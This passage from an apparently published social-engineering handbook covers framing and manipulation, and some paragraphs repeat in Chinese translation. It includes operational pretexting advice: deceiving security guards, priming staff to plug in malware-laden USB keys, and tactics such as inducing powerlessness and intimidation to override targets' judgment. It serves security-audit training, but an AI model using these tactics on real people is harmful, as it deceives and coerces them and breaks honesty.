Snow and Benford propose that when proper frames are constructed as described in these four points, large-scale changes in society such as those necessary for social movement can be achieved through frame alignment. Their studies focus on society as a whole, but these same principles are effective when dealing on a smaller scale or even one-to-one.

The preceding discussion covers only the process leading to frame alignment; in fact, four different types of alignment can occur after these four conditions are met. Although many of these aspects are geared towards framing groups as a whole, the following sections discuss these four framing alignments on a personal level, showing how you can use them on a smaller scale, as a social engineer or simply as a person wanting to align frames with others. Imagine trying to align your goal of entry to a building with the frame of the security guard designed to stop you. Bringing his frame into alignment with your pretext can ensure success.

One thing to remember about frames is that they are never constructed from scratch. Frames are always drawn on already-existing cultural codes that involve the core of a person’s beliefs and experiences. Knowing this will affect how you use framing.

Frame Bridging

The Cathie Marsh Centre for Census and Survey Information defines frame bridging as the linkage of two or more ideologically congruent but structurally unconnected frames regarding a particular topic.

Bridging is not so much about tricking people into believing your frame as it is about understanding their frame so deeply that you find the connecting link. You then use that connecting link to bring a target into your frame.

The situation could be that you want to gain access to an area, building, or piece of information. Your frame is that you want that to happen. The frame of the person you are approaching is not necessarily to stop you; he may not even know what you are going to attempt. If you were to approach the situation in that frame you may alert him to a problem and thereby shut down your chances.

By understanding the target’s job, role, and mental outlook you can understand his frame of mind and maybe find a link that will make his transition into your frame much easier.

What is your pretext? How would the person you are about to approach treat a person in your pretext? A good social engineer must understand this to be successful. The “gatekeeper” will treat a sales guy differently from the soda delivery guy. Understanding the frame of the target means knowing how he will treat you—not you as a social engineer, but you as the pretext.

A more personal example may be to think of how you want others to view you—maybe as cool, “together,” intelligent, or confident. A professor wants to appear smart. A manager wants to appear in control. An athlete wants to appear calm and strong. A comedian wants the audience to view her as funny. All of these are frames that a person wants others to be in alignment with.

In the comedian’s case, what if there is a heckler—a person who doesn’t see her as cool, funny, intelligent, or confident? Because of the heckler’s frame, is he angry, unhappy, put off, or just not interested? If the comedian persists in her own frame she may convert some people around her, but until she delves deep and tries to understand where someone is coming from she will not be able to align their two frames and bring that person into hers. The comedian who can handle a heckler is able to put aside her fears about her frame and use the heckler to her advantage.

The frame bridging alignment technique can be one of the most powerful used by a social engineer, but it involves some preparation to make sure you get it right.

A social engineer can utilize this particular form of frame alignment by helping a target bridge the gap of what they see and what they need to believe through a proper pretext. Again, recall the example of trying to gain access to the building as a tech support rep. Your dress, tools, and language must match the frame that the target expects of a support rep. If they do, the bridge is created and alignment occurs.

Frame Amplification

Frame amplification, according to Snow, refers to “the clarification and invigoration of an interpretive frame that bears on a particular issue, problem, or set of events.” In other words, you will amplify, or focus on, the values or beliefs of the target. By focusing on those values you can find an area that will align your two frames, or at least drive the target to think there is alignment.

This form of alignment has been labeled as the most basic of the four because it is more of a maintenance method. It involves the accenting, augmenting, or punctuating of an event as being more important than others, which allows for this event to be linked with other events with greater ease.

An example of frame amplification can be revealed if we do further research into the earlier example about the full-body X-ray scanners. The scanners are being sold now as deterrents for terrorists. The frame that they are being sold under is how the recent terrorist activity caused a need for products like these, and here they are to fulfill that need. Yet research into these devices shows they were being built, marketed, and rejected long before the attacks of 9/11 and other recent attacks.

Using the events of 9/11 combined with the fear of flying many people have due to those attacks enables the scanner companies to link their frame with the frame of fear many people have, and thereby gain support for implementing these devices in airports around the globe.

One of the other strengths of frame amplification is that it can be successfully used to blur the frame and cause people with a certain belief to distance themselves from that belief. For example, many who believed in privacy and the freedom to choose how to be screened have been brought into a different frame by the X-ray scanner manufacturers focusing on certain aspects of other screening methods being unsafe or incomplete, and to prove their point they bring out stories like “the underwear bomber.” Such tactics amplify their frame that the new X-ray scanners are better and safer, using widely held beliefs regarding the lack of security of other methods.

A social engineer can utilize this alignment technique in a few different ways. For instance, a social engineer may want to convince a security guard to give him access to an onsite dumpster area. The pretext of working for a waste disposal contractor is good and it very well may work alone, but it would work even better if you presented the idea that there is damage to one of the dumpsters, which represents a security liability for the company. Amplifying that frame can bring you to an alignment with the security guard that the best solution is allowing you onsite to check it out.

Frame Extension

“Frame extensions are a movement’s effort to incorporate participants by extending the boundaries of the proposed frame to encompass the views, interests, and, more importantly, the sentiments of a group.” In other words, by extending your frame’s boundaries to encompass other subjects or interests of your target, you can bring them into alignment.

For example, the possibility exists that groups who support environmental or “green” initiatives will extend their frame to antinuclear movements, stating they are under the umbrella of being concerned about the environmental risks.

However, a risk with using frame extensions is that they can weaken the stance on the original frame, and a certain level of appeal can be lost. This happens when too many frame extensions are included in a single frame, eventually diluting the main frame and causing interest to be lost.

Even on a personal level, simple is best. When using this frame alignment tactic, keep it simple and easy to follow. Don’t make the connecting web so convoluted you lose the interest of the target.

A social engineer may utilize this frame alignment technique through the elicitation skills discussed in Chapter 3. When a social engineer approaches a target, she can gather information about the target or their company not by appearing interested in it, but by using chit-chat at a party or by adopting the pretext of a reporter. This will give the social engineer the “right” to ask for information that she would normally have to work very hard to get.

Frame Transformation

“Frame transformation is a process required when the proposed frames may not resonate with, and on occasion may even appear antithetical to, conventional lifestyles or rituals and extant interpretive frames.” In other words, a social engineer offers new arguments that point to why their frame is better in an effort to transform the thoughts or beliefs of a target from where they are to where the social engineer wants them to be.

When a frame transformation occurs, new values and new understandings are required to keep people involved and keep their support. This type of transformation was done on a large social level in the 1970s, when the conservative movement was reframed or transformed into a more progressive environmentalist movement.

On a smaller, more personal scale, frame transformations occur every day through religious conversion, in which a person’s frame or whole belief system is altered, changed, and transformed to be aligned with a new frame of thought, that of the new religion.

Transforming someone’s frame is not easy; it is one of the most complicated alignment tactics to put into practice because it can take:

  • Time: Changing someone’s whole belief structure is not a quick process; it can require the use of other alignment techniques and lots of time to make it work.
  • Effort: Knowing where the target is coming from and where you want him to be are just the initial steps. What will be his objections and mental blocks? Finding out these things will take some work.
  • Education: Knowledge is power. You must help the target understand the new frame you want him to “convert” to.
  • Logic: The education must be logical and not all emotion. The target must be able to reason and rationalize the action he is about to take. The only way he can do that is with logic.
  • Deep emotional ties: Knowledge is what prepares a person for action, logic convinces him the action is good to take, but emotion is what makes the action happen. If you are emotional about your “cause” the target will feel that emotion. Just make sure the emotion you are expressing and feeling matches the pretext. If your pretext is a guidance counselor and you come in like a cheerleader you will offset the target’s ability to align.

Being able to align others to your frame and align yourself with theirs can give people incentive to do the things you ask. Although using any of the four framing methods is powerful, a social engineer who is successful in frame transformation has endless power.

Read on to find out how to apply these framing techniques as a social engineer.

Using Framing as a Social Engineer

Throughout this section I mentioned many ways a social engineer might use framing as a technique. Some of these methods are so powerful that perfecting them can turn you into a master influencer.

To truly use framing as a social engineer you must understand four things about framing. These four things will help you to understand clearly how framing works and how to use it as a social engineer.

Remember what a frame is. A frame is a conceptual structure that our minds use in thinking. This is a vital piece of information because your goal is either to create a new frame, align with a person’s frame, or bring the target into your frame.

Whichever of those three goals you pursue, it needs to be worked out against the following four rules in order to master framing as a social engineer.

Rule 1: Everything You Say Will Evoke a Frame

People’s minds work by picturing things. This natural fact cannot be altered, but you can use it to your advantage.

If I start to talk to you about your boss, your mind will picture him. If I paint a picture with words about how he was outside on the cell phone and he was angry, your mind will start to picture his angry face, body language, and words. You will not be able to control this and that mental frame will cause emotions and reactions.

Painting a picture with words is a powerful way to use framing. By choosing your words carefully you can cause a target’s mind to picture things you want him to picture and start moving him to a frame you want.

Have you ever heard someone who you thought was a great storyteller? Why? What made her great? She was able to paint a mental picture and make you see things in your mind, which intrigues you and gets you involved. This skill is very important for a social engineer. It doesn’t mean you talk as if you are telling a great story all the time, but you want to keep in mind the words you choose, because those words hold the power to paint pictures in the minds of your targets.

Here is a simple example: I can tell you that I had spaghetti for dinner last night. If you are not a foodie or not Italian, maybe the last time you had spaghetti it wasn’t that pleasurable. Your mental frame is not that strong and you might be turned off.

What if I told you that last night my wife made a sauce of vine-ripened tomatoes and basil she grew in the garden? It also had chunks of fresh garlic and oregano in it, as well as a hint of red wine flavors. She served it over a plate of perfectly cooked spaghetti noodles and with homemade garlic bread.

Whether or not you are a pasta fan, you are picturing a restaurant-quality dish. This is how you should plan your words with your targets. They should be descriptive, robust, and full of pictures. Yet the caution is not to be overly theatrical as a social engineer. Your goal should be to build a picture with your words, not to draw attention to yourself or your delivery.

Rule 2: Words That Are Defined Within a Frame Evoke the Mental Frame

You don’t have to use the exact words to make a person picture the frame you want. For example, what do you think of when you read the following sentence?

“I saw the insect struggle to get free from the web, but he could not. Moments later he was wrapped up in a cocoon and saved for dinner.”

Notice that I didn’t have to mention a spider to make you think of a spider. If I want to frame you into thinking about a spider, I can do it without having to mention the word spider. This powerful rule of influence and framing gives a social engineer the ability to control the target’s thoughts using indirect speech.

Toastmasters, the international organization focused on people’s speaking abilities, teaches its members to move people with their speech by getting their audience’s emotions involved. Delivering a story that causes the target to picture the frame you want while involving them emotionally will solidify your standing in leading that conversation.

Again, using this method of framing will take planning. A powerful aspect to this frame rule is that while a target’s brain is processing the information you are feeding it and generating the mental pictures you are painting, there is a time when you can plant thoughts or ideas. Unlike where I painted a direct picture of a beautiful pasta dish, this rule allows the target the freedom to picture something else.

I could have ended my earlier spaghetti dinner story with, “My wife then served it on a plate of perfectly cooked pasta. What kind of pasta? I am not telling you, you have to picture it,” and when your brain starts to picture it then I can say, “As I twirled it on my fork, the sauce was so thick and perfect it clung to each noodle.”

This description paints the mental picture of spaghetti. What other pasta do you twirl? (I know there are others, but you get the point.)

Rule 3: Negating the Frame

If I tell you not to picture a spider in a web, your brain has to picture the spider first in order to tell itself not to picture it.

This technique of negating the frame is powerful. Telling a target to be careful, watch out, or be cautious about something automatically puts them in the frame you may want. This technique is often used by professional social engineers. In one interview I did with a panel of social engineers, everyone agreed that this technique works great.

During one audit, I dropped a few USB keys that were laden with malicious code that I wanted someone in the company to run without thinking. I approached one of the employees who I had gained the trust of and said, “John, I heard a memo was issued to be on the lookout for a few USB keys that have been dropped. They are looking for them now.”

It just so happens that you are in there as a janitor and you dropped the USB keys laden with malicious files, and now by telling people to look out for them, you are in essence planting the seed for them to do your bidding. This kind of phrase negates the worry they may feel when finding a rogue USB key and causes them to plug it in to see whose it is.

Rule 4: Causing the Target to Think About the Frame Reinforces That Frame

Every time the brain focuses or thinks about something it is reinforced. The more you can make the target think about or picture the frame you want him in, the easier it will be to reinforce and move him to that frame.

Look back at Chapter 2 on communication modeling and analyze how the messages a social engineer will develop can have amazing effects on your targets.

I was once traveling in India. I don’t remember the exact incident in the news, but all I know is that President George W. Bush had lost favor with people in Europe. I was flipping through the news stations and saw how people in certain European countries were hanging dolls that looked like George W. Bush in the streets. After wrapping American flags around the dolls they were lighting them on fire.

It was a shocking scene and while I was on the phone with my wife that evening I said, “Wow that news story on what’s happening in Europe is crazy, huh?”

She hadn’t heard anything about it. Why? News media and news stations are masters when it comes to framing and manipulation.

A social engineer can learn a lot from looking at how media utilizes this skill. By using omissions, or leaving out details of a story or the whole story itself, the media can lead people to a conclusion that seems like their own, but really is the media’s.

Social engineers can do that, too. By omitting certain details and only “leaking” details that they want leaked, they can create the frame that they want the target to think or feel.

Labeling is another tactic used by the media. When they want to frame something positive they may say things like, “the strong defense of…” or “our healthy economy.” These phrases paint mental pictures of stability and health that can help draw positive conclusions. The same rules can apply for negative frames, too. Labels such as, “Islamic terrorists” or “conspiracy theories” paint a very negative picture.

You can utilize these skills to label things with descriptive words that will bring a target into the frame you want. Once, approaching a guard booth that I wanted to gain access to, I walked right through as if I belonged. I was abruptly stopped. I looked at the guard in shock and apologetically I used a phrase like, “Oh, yesterday that extremely helpful security guard, Tom, checked out all my creds and let me pass. That is why I assumed I was still on the list.”

Labeling the previous guard as “extremely helpful” automatically puts the present guard in a frame I want. If he wants to receive such a prestigious label, he had better be as “extremely helpful” as Tom was.

Framing is effective because it bends the truth but not so much that it becomes false, so it remains believable. A social engineer can create a desired impression without departing too far from the appearance of objectivity.

I read a white paper called “Status Quo Framing Increases Support for Torture,” written by Christian Crandall, Scott Eidelman, Linda Skitka, and Scott Morgan, all researchers from different universities. In the white paper they supplied a very interesting data set that intrigued me on this topic. In the U.S. it seems many people are against the use of torture in wartime as a tactic for gaining intelligence information. The purpose of this study was to see whether the researchers could get a subset of people to agree that torture is less disagreeable by framing the message differently.

They took a sample group of roughly 486 people and asked them to read two paragraphs.

The first one read:

The use of stress by U.S. forces when questioning suspects in the Middle East is in the news. This kind of stress interview is new; according to some reports, it is the first time it has been widely used by the U.S. military. American forces have used many different methods, including strapping detainees to a board and dunking them underwater, stuffing detainees face-first into a sleeping bag, and long periods of hanging detainees by ropes in painful positions. Detainees are also kept awake and alone for days at a time.

This paragraph paints the thought that these are new techniques being employed by the U.S. Government to obtain data.

The second paragraph read:

The use of stress by U.S. forces when questioning suspects in the Middle East is in the news. This kind of stress interview is not new; according to some reports, it has been used for more than 40 years by the U.S. military. American forces have used many different methods, including strapping detainees to a board and dunking them underwater, stuffing detainees face-first into a sleeping bag, and long periods of hanging detainees by ropes in painful positions. Detainees are also kept awake and alone for days at a time.

The status quo version of the paragraph was identical, except that the second sentence in the paragraph was replaced with “This kind of stress interview is not new; according to some reports, it has been used for more than 40 years by the U.S. military.”

What were the results in just changing one frame—a frame that these are brand-new methods or that these are tried-and-tested methods that have been used for decades?

The paper describes the researchers’ measures. Seven items formed the basic set of dependent variables. These items corresponded to a seven-point “button” scale, with the point labels of very much disagree, moderately disagree, slightly disagree, uncertain, slightly agree, moderately agree, and very much agree. All items were reverse scored so that higher scores reflected greater agreement with each item.

The conclusion? “The status quo manipulation had an effect on overall evaluation of torture—when described as a long-standing rather than new practice, torture was evaluated more positively; [m]aking torture appear to be the status quo for interrogations increased individual support and justifications for using it as a tactic.”

 

通过仅仅改变框架的一小部分,研究人员就能够让相当多的人达成共识,并让他们(大部分)同意酷刑是一种可以接受的政策。

By changing just one little part of the frame the researchers were able to bring a sizeable group of people into alignment and make them agree (for the most part) that torture can be an acceptable policy.

 

该论文继续评论道:“它们可以应用于许多领域,并可以影响判断、决策、审美和政策偏好”,最后总结道,“在道德选择和价值困境的呈现、框架或背景方式上进行相对温和的变化,可能会对政治选择和政策产生深远的影响。”

That paper’s remarks continued, “They can apply across many, many domains, and can affect judgment, decision making, aesthetics, and policy preferences,” concluding with, “relatively modest changes in the way ethical choices and value dilemmas are presented, framed, or put in context can have profound effect on political choice and policy.”

 

这个实验证明了框架的力量,因为它甚至可以改变人们多年来形成的核心信念、判断和决定。作为一名社会工程师,这在大多数情况下甚至不是目标。你不是试图改变人们;你只是试图让他们采取一种他们稍加思考就会明白不太好的行动。

This experiment proves how powerful framing is because it can change even core beliefs, judgments, and decisions that people may have had for years. As a social engineer that is not even the goal most of the time. You are not trying to convert people; you’re just trying to get them to take an action that with a little thought they would reason is not that good to take.

 

运用四条框架规则并进行大量规划,可以使框架成为一股不可忽视的毁灭性力量,不幸的是,这也是恶意社会工程师每天都在使用这种技术的原因。尤其是在美国和“西方文化”中,人们被训练成接受被框架,接受被告知要想什么以及如何思考。

Applying the four framing rules and doing a lot of planning can make framing a devastating force to be reckoned with, which is why, unfortunately, malicious social engineers use this technique every day. In the U.S. and “westernized cultures,” especially, people are trained to accept being framed, to accept being told what to think and how to think it.

 

如果 15 年前我告诉你,电视上几乎每个节目都是关于观看真人做真事的,你可能会笑我。为什么?因为看这样的节目听起来很无聊,很傻。然而,2006 年,《洛杉矶时报》称,真人秀电视节目的数量猛增了 128%(http://articles.latimes.com/2010/mar/31/business/la-fi-ct-onlocation31-2010mar31),自那以后,这种增长势头一直没有减缓,这是因为观看真人秀是新鲜和时尚的,我们被告知观看真人秀既好玩又有趣,所以每个人都在观看。这些节目就是一个例子,说明几年前大多数人认为很傻的事情可以变得很好看。

If I told you 15 years ago that almost every program on television would be about watching real people do real things, you might have laughed at me. Why? Because watching shows like that sounded boring and silly. Yet in 2006, the Los Angeles Times stated that the number of reality TV programs jumped up 128% (http://articles.latimes.com/2010/mar/31/business/la-fi-ct-onlocation31-2010mar31), and it hasn’t slowed down much since then, and it’s because watching them is what’s new and hip, and we are told that watching them is good and fun, and everyone does it. These shows are an example of how one thing can be made to look good that most people would have considered silly just a few years earlier.

 

框架绝对是一种艺术形式,当它与沟通和影响的科学相结合时,在熟练的社会工程师手中可以成为个人层面上的一股强大力量,通过以一种让目标“容易”与社会工程师保持一致的方式呈现信息,可以让他采取不会让他感到内疚的行动,并改变他对现实的看法。

Framing is definitely an art form that when mixed with the science of communication and influence can become a formidable force on a personal level in the hands of a skilled social engineer, through presenting information in a way that can make aligning with the social engineer “easy” for the target, can make him take action that will not leave him feeling guilty, and alter his perception of reality.

 

框架和影响是社会工程学的关键部分,尽管另一项技能通常与社会工程学的“黑暗角落”有关。本书的介绍中提到了窥视这些角落;以下部分介绍的信息将改变您看待影响的方式。

Framing and influence are key parts of social engineering, although another skill is often associated with the “dark corners” of social engineering. The book’s introduction mentioned peering into these corners; the following section presents the information that will alter the way you look at influence.

 

操纵:控制你的目标

Manipulation: Controlling Your Target

 

Manipulation is considered by many to be a very dark topic, one that creates a sense of fear because of the way it is often portrayed.

Taking a look at a few definitions found on the Internet may help to explain:

  • “exerting shrewd or devious influence especially for one’s own advantage”
  • “influence or control shrewdly or deviously”
  • “control (others or oneself) or influence skillfully, usually to one’s advantage”

You can clearly see why many social engineers drool over this topic. Can you imagine being able to use your skills to control or influence someone to your advantage?

From something as dark as brainwashing to the subtle hints of a salesperson, manipulation tactics are something every social engineer should study and perfect. The aim of manipulation is to overcome the target’s critical thinking and free will. When the target loses the ability to make a decision based on an informed process, he can be fed the ideas, values, attitudes, or reasoning of the one manipulating him.

Manipulation is used in six ways that hold true whether the topic is brainwashing or something less insidious. I will quickly go through each one before we get into this very deep section.

  • Increasing the suggestibility of your target. At its most extreme, sleep or food deprivation increases a target’s suggestibility. On the lighter side, subtle hints that build in intensity over time make your target more suggestible.
  • Gaining control over the target’s environment. This technique can involve everything from controlling the type and quantity of information to which a target has access to much subtler things, like gaining access to a target’s social media accounts. In a social engineering context, having access to social media lets you view your target’s communications as well as exert control over the information he receives.
  • Creating doubt. Destabilizing and undermining your target’s belief system can go a long way toward manipulating him into taking an action you want. From a social engineering viewpoint, this must be done subtly. You can’t just barge in and start degrading your target; instead, questioning the rules he follows, his job, or his beliefs can affect his ability to make rational decisions.
  • Creating a sense of powerlessness. This truly malicious technique is used in wartime interrogations to make a target lose confidence in his convictions. A social engineer can use this tactic by taking away the target’s agency, presenting “facts” you received from someone with authority and thus creating a feeling of powerlessness.
  • Creating strong emotional responses in the target. Strong emotional responses include everything from doubt to guilt to humiliation and more. If the feelings are intense enough, they can cause the target to alter his whole belief system. A social engineer must be careful not to create damaging negative emotions, but tactics that create an emotional response based on fear of loss or punishment can prove beneficial to your SE goal.
  • Heavy intimidation. Fear of physical pain or other dire circumstances can be used to make a target crack under pressure. Again, most social engineers will not go this route unless they are engaged in corporate espionage, but in normal social engineering this tactic uses perceived authority to build strong fear and feelings of potential loss.

Most times, however, manipulation is not so extreme. On its most basic level, imagine you’re in a crowded room and someone calls out your name. What is your reaction? Usually it is to turn around or respond with a “Yes?” You have been manipulated, but not necessarily in a bad way.

On a psychological level, being manipulated is even more profound. Notice what happens to make that interaction occur: your brain hears your name, and you automatically formulate an answer (“Yes?”). The gap between that answer and your vocal response is very short. Even if you make no vocal response, or if the name being called is not yours, your mind will still formulate an answer whenever a question is asked.

Just being in close proximity to two people conversing and overhearing a question will cause your mind to formulate an answer. The answer can be an image or a sound in your mind. If a target overhears two people talking about what someone looks like, his mind will form a mental picture. If you hear two people telling a joke about a chicken crossing the road, you may picture the chicken, the road, or the whole scene.

This type of manipulation is just the beginning of what you can do. Another manipulation tactic is conditioning.

People can be conditioned to connect certain sounds or actions with feelings and emotions. If every time something positive is mentioned a person hears a pen click, after a short time the target can be conditioned to associate a positive feeling with that sound.

One of the most classic examples of conditioning is Ivan Pavlov and what we call Pavlov’s dog, which was discussed in Chapter 5. The question then becomes whether you can use this type of conditioning on people. Although making targets salivate is not on most social engineers’ priority list (although it would be humorous), are there ways to condition a target to react to certain sets of input the way you want?

To find the answer, read the following sections, which provide a few examples of manipulation in business and marketing to set a foundation for discussion and an analysis of how to use manipulation on a personal level.

To Recall or Not To Recall

In May 2010, The Washington Post reported an interesting story (www.washingtonpost.com/wp-dyn/content/article/2010/05/27/AR2010052705484.html). The maker of children’s Tylenol, Motrin, Benadryl, and Zyrtec, among other liquid over-the-counter medicines, discovered a defective batch of Motrin and didn’t want to perform a recall because of the cost of such an action. What was the company’s answer?

It used manipulation. The company hired a slew of contractors to go from store to store and buy back all the Motrin on the shelves, which would then be destroyed. Its plan was foiled when a contractor dropped a paper outlining the plot in one store; the paper was then reported to the Food and Drug Administration (FDA).

On a side note, the FDA did make the company recall 136 million bottles in just one of four recalls. Unfortunately, it was too late: 775 cases of children and infants having adverse reactions to this tainted batch were reported, 37 of them ending in death. The reports are not conclusive as to whether the deaths were a result of the bad batch or a reaction to Motrin itself. That is not the focus here.

This is a very dark example of manipulation, or at least attempted manipulation. To protect its image, the company was willing to forgo proper procedures and the safety of children all over the world. It attempted to manipulate the system, and in the process people lost their lives. The documentation dropped in the store discussed how the contractors were under orders to buy the product back and not mention “recall” at any point.

When the company was caught, it deployed many interesting manipulation tactics. It deflected the situation by saying the reason for the action was that its experts didn’t think a significant risk to children existed.

It followed this statement with a formal apology and the firing of six top executives. Then the real manipulation came in. While being questioned, the company stated that it was not trying to do a “phantom recall,” as it was being called; it was having the contractors buy back the allegedly damaged batch so that it could be tested, and if the batch was found faulty the company would have followed the proper procedures. This is a manipulation technique called diversion: diverting attention from what they were really doing to make it seem better than it was. In addition, the company used a cover-up technique to manipulate the thinking of those who disagreed with its actions, issuing statements that it was trying to do testing to determine whether a recall was needed.

This type of manipulation is worth discussing because a diversion tactic can work on a much smaller scale in a personal setting, too. If you are caught in an area or place you should not be, having a believable cover story can go a long way toward manipulating the target into allowing you safe passage. Diverting the target’s attention to something other than the problem at hand can give you enough time to redirect his or her concern. For example, if you are caught by a security guard, instead of getting nervous you could simply look at him and say, “Do you know what I am doing here? Did you hear that some USB keys have been lost with very important data on them? It is imperative we find them before everyone comes in tomorrow. Do you want to check the bathrooms?” Note that the only thing that defeats this diversion is procedure: a guard who verifies the story with the security desk or a known contact before joining the search, and who escorts the intruder rather than leaving him unattended, gives the social engineer no room to work.

Many of you probably never heard about the Motrin recall story, which shows that the company did a good job (so far) of manipulating the media and the justice system to keep the limelight off of it. Regardless, this situation outlines how diversion and cover-up can be used in manipulation.

Anxiety Cured at Last

In 1998 SmithKline Beecham, one of the largest pharmaceutical companies in the world, launched an ad campaign designed to “educate” the masses about something it called “social anxiety disorder.” It planted 50 press stories and surveys with questions like, “Do you have social anxiety disorder?” These quizzes and surveys were geared to “educate” people about the disorder and how to tell whether they suffered from it.

Later that year it changed its marketing copy in medical journals from “Paxil means peace…in depression, panic disorder, and OCD” to “Show them they can…the first and only approved treatment for social anxiety disorder.” This change cost the company about $1 million to make.

In 1999, a $30 million print and television campaign was launched announcing that SmithKline Beecham had found the cure for social anxiety disorder, and its name was Paxil. Using the data from the surveys and quizzes, the company bought spots in some of the “hottest” television shows of the time and spouted statistics that 10 million Americans suffer from SAD (social anxiety disorder), and that now there is hope.

By 2000, Paxil sales accounted for half of the increase in the entire market: the company “became number one in the U.S. selective serotonin reuptake inhibitor market for new retail prescriptions in 2000.” In 2001 it won FDA approval to market Paxil for both generalized anxiety disorder and posttraumatic stress disorder.

The 9/11 attacks resulted in a dramatic increase in prescriptions for all antidepressants and anxiety drugs. During this time Paxil’s advertising positioned it as an answer to the uncontrollable feelings of fear and helplessness that many people felt in the aftermath of the attacks.

I am not saying that these drugs do not work, or that the company’s motive was malicious, but I find this case particularly interesting in that the manipulation of the market started with education and ended with a massive increase in sales, while creating new disorders along the way.

This type of case-building manipulation is often used in marketing, but it is also used in politics and even on a personal level: present a terrible problem, then present the “facts” you have derived as proof that what you say is true. In one episode of The Real Hustle, Paul Wilson set up a scenario in which he had to extract a famous star whom the team was using in a scam to steal some CDs from a store. The store clerk detained the star and waited for the police to arrive. Paul walked in, identified himself as a police officer, flashed his wallet with nothing more than a picture of his kids in it, and was able to “arrest” the star, take the CDs and the money in the cash register as evidence, and leave unquestioned. This story is an excellent example of case-building manipulation. Paul had a problem (the thieving star) and presented himself as the solution (the police officer). Whatever the scenario, build the case for what a good person you are before presenting your request; that case makes the request more palatable to the person you are trying to manipulate.

You Can’t Make Me Buy That!

Kmart. I felt like just leaving this section at that, but I think I should explain more. Kmart developed an idea it called the planogram, a diagram that shows retailers how to display their products based on colors, sizes, and other criteria in order to manipulate customers into wanting to buy and spend the most.

Planograms are designed to create optimal visual and commercial product placement.

The use of planograms is a form of manipulation because researchers have studied how people shop, think, and buy. Understanding these things helped them develop mechanisms to control visual input in order to increase shoppers’ desire to buy.

Software, as well as whole companies, are devoted to planning and executing these planograms for maximum effect in keeping shoppers shopping.

Three different layouts are used to manipulate shoppers:

  • Horizontal product placement: To increase a customer’s concentration on a certain article, multiple units of one product are placed side by side horizontally. Some retailers found that a minimum placement range of 15 to 30 cm for a single product is necessary to achieve an increase in customer attentiveness (see Figure 6-8).
  • Vertical product placement: A different method is vertical product placement. Here one product is placed on more than one shelf level to achieve 15–30 cm of placement space (see Figure 6-9).
  • Block placement: Products that have something in common (brands, for example) are placed in a block. This can be done side by side, on top of each other, centered, or using magnetized hangers (see Figure 6-10).

Figure 6-8: Placing the same or similar items in a horizontal row, as shown in this computer-generated planogram, increases customer focus.

[image: f0608.tif]

Figure 6-9: Products are grouped together to draw the eye to the items the retailer wants to sell.

[image: f0609.tif]

Figure 6-10: Another example of a few different types of planograms being used at once.

[image: f0610.tif]

Planograms are not the only method of manipulating shoppers. One test involved a shopping mall running specifically designed music loops. The result was that shoppers stayed in the mall an average of 18% longer than when the music was not running.

In the Journal of Business Research, Jean-Charles Chebat and Richard Michon published a study they performed in a Canadian shopping mall (www.ryerson.ca/~rmichon/Publications/Ambient%20odors.pdf). The researchers pumped specially designed aromas into the air that were supposed to trigger happiness and the desire to buy. The result was that an average of $50 more per shopper was spent during that week-long study.

Your trips to shopping malls and grocery stores will never be the same now. However, you can learn a lot from these methods and experiments. Knowing how people group things in their minds can affect how you organize your shelves to manipulate the feelings, emotions, and thoughts of your targets.

On the topic of colors: they are a major way to manipulate the emotions of a target. Many of the same principles apply to colors as to product placement. The colors you choose to wear or use can affect the target. A lot of research has been done on colors and their effects. The following is a short list of some ways a particular color could affect the thinking or emotions of another person:
  • White: White is often associated with purity, light, and cleanliness. It gives feelings of safety and neutrality as well as goodness and faith. This is why white is often used in weddings or as the color of surrender.
  • Black: Black often denotes power, elegance, mystery, and strength. It is used to denote authority, depth, and stability. Black gives a feeling of calmness and tranquility. Because it contrasts with other colors, it can also be used to enhance them.
  • Red: Red is associated with excitement and joy. It is a color filled with celebration, action, and energy. It can denote good health, speed, passion, desire, and love. Red can stimulate emotions as well as increase heart rate, respiration, and blood pressure.

Red can trigger strong emotions, so use caution with it. Although it can denote power and impulsiveness, it can also denote force, intimidation, and conquest, even violence and revenge. Be careful how you use red.

  • Orange: Orange conveys warmth, enthusiasm, attraction, determination, strength, and endurance. It can make a person feel invigorated and can even stimulate his or her appetite.

Orange is another color to be cautious with. Although using orange has many benefits, such as making the viewer feel warm and attracted to you or your product, too much of it or the wrong combination can create feelings of insecurity, ignorance, and sluggishness.

  • Gold: Gold is usually associated with illumination, wisdom, wealth, and prestige.
  • Yellow: Yellow is associated with energy and optimism, joy and cheerfulness, loyalty and freshness. It can cause a person to feel focused and attentive.

Yellow also has an impact on a person’s memory (why are so many sticky notes yellow?). Used in small amounts, it can trigger positive emotions, but too much can cause a target to lose focus or feel criticized.

  • Green: Green is often associated with nature, harmony, life, fertility, ambition, protection, and peace. It can produce a very calming effect, making someone feel safe.

Green is another powerful color, but it can also make one feel greedy, guilty, jealous, and disordered if used in the wrong setting or used too much.

  • Blue: Blue is the color of the sky and the ocean. It can be linked to intelligence, intuition, truth, tranquility, health, power, and knowledge. It is very calming and cooling and has been said to slow down the metabolism.

Blue is the easiest color for the eyes to focus on. It can have many positive effects, but be careful not to make the target feel cold or depressed.

  • Purple: Purple is associated with royalty, nobility, luxury, creativity, and mystery.
  • Brown: Brown is associated with earth, reliability, approachability, convention, and order. It can create emotions of being rooted or connected, or of having a sense of order.

How can you use all this information? I am not suggesting that with a simple blue outfit you can make someone feel calm enough to hand you her password. Yet you can use this information to plan your attack vectors, ensuring you have the best opportunity to succeed, which includes how you look and how you are dressed.

A social engineer would want to analyze the target he will be calling on and make sure the colors he chooses to wear augment his ability to manipulate the target rather than turning the target off. For example, knowing that green may elicit feelings of greed or ambition can help a social engineer decide not to wear green to a meeting with a charity, where it might conjure feelings and emotions contrary to the charity’s mission. Wearing something blue to a lawyer’s office, on the other hand, can have a calming effect, allowing the lawyer to open up more. Careful planning and sensible use of these tactics can help ensure the success of your social engineering audits.

Conditioning Targets to Respond Positively

条件反射在一切事物中都有应用,从正常对话到营销再到恶意操纵。就像巴甫洛夫的狗一样,人们已经习惯对某些事物做出反应。人性常常被用来操纵大多数人采取操纵者想要的行动。

Conditioning is used in everything from normal conversation to marketing to malicious manipulation. Just like Pavlov’s dog, people have been conditioned to respond to certain items. Human nature is often used to manipulate the majority of people to take actions the manipulators want.

 

大多数人想到婴儿时都会微笑,我们会觉得会说话的动物很“可爱”,我们甚至可能会在脑海里唱出一种流行产品的广告歌。

When the majority of people think of babies they will smile, we will find talking animals “cute,” and we might even be manipulated to sing a jingle for a popular product in our head.

 

这些手段非常隐蔽,很多时候我们甚至不知道它们在起作用。很多时候,我发现自己在想,衣着暴露、穿着比基尼的女人和啤酒有什么关系。

These tactics are so covert that many times we don’t even know they are working. Many times I find myself wondering what a scantily clad, bikini-wearing woman has to do with beer.

 

